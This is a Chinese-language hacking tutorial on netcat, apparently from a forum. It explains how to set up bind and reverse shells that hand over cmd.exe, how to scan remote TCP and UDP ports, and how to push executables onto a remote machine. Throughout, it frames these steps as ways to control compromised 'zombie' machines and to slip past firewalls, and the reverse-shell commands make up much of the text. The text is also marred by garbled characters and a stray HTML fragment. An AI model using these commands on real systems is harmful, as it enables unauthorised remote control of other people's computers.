命令1:監聽命令
nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port
參數解釋:
-l:監聽端口�,監聽入站信息
-p:后跟本地端口號
-v:顯示端口的信息��,如果使用-vv的話�����,則會顯示端口更詳細的信息
提示:一般大家都愛用-vv
nc -l -p 80
這個很簡單���,監聽80端口
如果機器上運行這個命令���,端口80被認為是開放的,可以欺騙很多掃描器的哦��!
nc -l -p 80 > e:\log.dat
呵呵���,功能和上邊一樣����,但是后邊加了個“> e:\log.dat”我想,學過ECHO
那個命令的人都會知道吧��,是在E盤創建一個log.dat的日志文件
nc -l -v -p 80
和上邊命令相似���,不過這次不是記錄在文件里����,而是會直接顯示在運行著NC
的屏幕上。
呵呵�����,講了這么多�,來實踐下
nc -l -v -p 80
然后在瀏覽器中輸入本機IP:127.0.0.1
呵呵,看到什么���?
同樣,上邊兩個也是一樣���,大家自己試驗一下吧
命令2:程序定向
nc -l -p port -t -e cmd.exe
本地機: nc -l -p port 或 nc -l -v -p port
目標機:nc -e cmd.exe ip port
參數解釋:
-l、-p兩個參數已經解釋過了
-e�����;作用就是程序定向
-t:以telnet的形式來應答
例子
nc -l -p 5277 -t -e cmd.exe
知道運行在哪里嗎���?千萬不要運行在自己的機器上�����,如果運行了,你機器
就會變成一臺TELNET的服務器了,呵呵,解釋一下:監聽本地端口5277的
入站信息����,同時將CMD.exe這個程序�,重定向到端口5277上��,當有人連接的時候����,就讓程序CMD.exe以TELNET的形式來響應連接要求�。
說白了,其實就是讓他成為一臺TELNET的肉雞���,所以這個命令要運行在你的肉雞上。。(話外音:說這么多遍當我們白癡啊�����,快往下講?���。。。?span id="ooqkw8y" class="Apple-converted-space">
呵呵���,咱們來找臺肉雞試試,我TELNET IP 5277
HOHO~~如何?
local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port
大家知道灰鴿子和神偷吧,這兩款工具都是利用了反彈端口型的木馬��,
什么叫反彈端口�?就是說����,當對方中馬后,不用你主動和對方連接���,也就是說
不用從你的client端向對方主機上運行的server端發送請求連接,而是對方主動來連接你
這樣就可以使很多防火墻失效�����,因為很多防火墻都不檢查出站請求的�。
這里這兩個命令結合在一起后��,于那兩款木馬可以說有異曲同工之效。為什么��?
咳?����?�!聽我給你講啊!?��。ㄏ冉?00000000RMB學費)哇,別殺我啊?�?����!)
nc -l -p 5277 (堅聽本地5277端口)
同樣也可以用
nc -l -v -p 5277
運行在本地
然后在遠程機器上�����,想辦法運行
nc -e cmd.exe ip 5277
(你可別真的打“ip”在肉機上?����。┮?,xxx.xxx.xxx.xxx這樣?�?�!
呵呵,看看在本地機器上出現了什么�����?
這樣就是反彈~~在本地機器上得到了一個SHELL
命令3:掃描端口
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
參數解釋:
-z:將輸入輸出關掉����,在掃描時使用
nc -v ip port
這個命令是針對某一個端口進行掃描
例如:
nc -v ip 135
掃描遠程主機的135端口���,這樣獲得了該端口的一些簡單信息�����,但是針對某些端口��,我們還可以獲得更多的信息
例如:80端口
我們可以使用nc -v ip 80 然后使用get方法來獲得對方的WEB服務器的信息
nc -v -z ip port-port
這個命令是用來掃描的一個命令,這個命令用于快速掃描TCP端口���,而port-port則是指定了掃描的端口范圍
例如:
nc -v -z ip 1-200
可以看到我機器上的1-200的TCP端口的開放情況
nc -v -z -u ip port-port
這個命令比上個命令多了個-u��,這個命令的作用仍然是掃描端口,只是多了一個-u的參數,是用來掃UDP端口的
例如:
nc -v -z -u ip 1-200
這個命令就會掃1-200的UDP端口
命令4:傳送文件(HOHO,I LIKE)
LOCAL MACHINE:nc -v -n ip port y:\svr.exe
參數解釋:
-n:指定數字的IP地址
這兩個命令結合起來是用來傳送文件的
首先�,在遠程機上運行命令:
nc -v -l -p 5277 > c:\pulist.exe
這個命令還記的嗎����?呵呵,是不是和監聽命令有點類似,對,沒錯,這個是監聽5277端口
并把接受到的信息數據寫到c:\pulist.exe中
這時候在本地機上運行
nc -v -n ip 5277 < e:\hack\pulist.exe
這個命令的意思就是,從本地E盤跟目錄中讀取pulist.exe文件的內容,并把這些數據發送到ip的5277端口上
這樣遠程主機就會自動創建一個pulist.exe文件�����。�����。呵呵�����,你想到了嗎�����??